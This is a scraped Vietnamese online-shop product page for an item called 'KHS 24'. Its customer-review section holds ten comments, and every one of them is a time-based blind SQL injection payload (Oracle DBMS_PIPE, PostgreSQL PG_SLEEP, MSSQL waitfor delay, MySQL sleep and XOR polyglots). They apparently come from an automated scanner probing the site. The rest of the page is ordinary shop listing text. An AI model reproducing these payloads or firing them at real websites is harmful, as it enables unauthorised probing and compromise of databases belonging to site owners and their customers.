Zalo

    Giỏ hàng của bạn trống!

KHS 24

Tình trạng: Còn trong kho
Liên hệ
0

18 đánh giá

comment
         
05/08/2020

e'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

comment
         
05/08/2020

muCAamXd')) OR 952=(SELECT 952 FROM PG_SLEEP(15))--

comment
         
05/08/2020

BBvQh2uE') OR 630=(SELECT 630 FROM PG_SLEEP(15))--

comment
         
05/08/2020

urf52YvR' OR 919=(SELECT 919 FROM PG_SLEEP(15))--

comment
         
05/08/2020

1IbRoZxK'; waitfor delay '0:0:15' --

comment
         
05/08/2020

1 waitfor delay '0:0:15' --

comment
         
05/08/2020

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

comment
         
05/08/2020

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

comment
         
05/08/2020

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

comment
         
05/08/2020

if(now()=sysdate(),sleep(15),0)

Sản phẩm mới ra mắt

KTT08

Liên hệ

KTT 07

Liên hệ

KTT 06

Liên hệ

KTT 05

Liên hệ
0903103879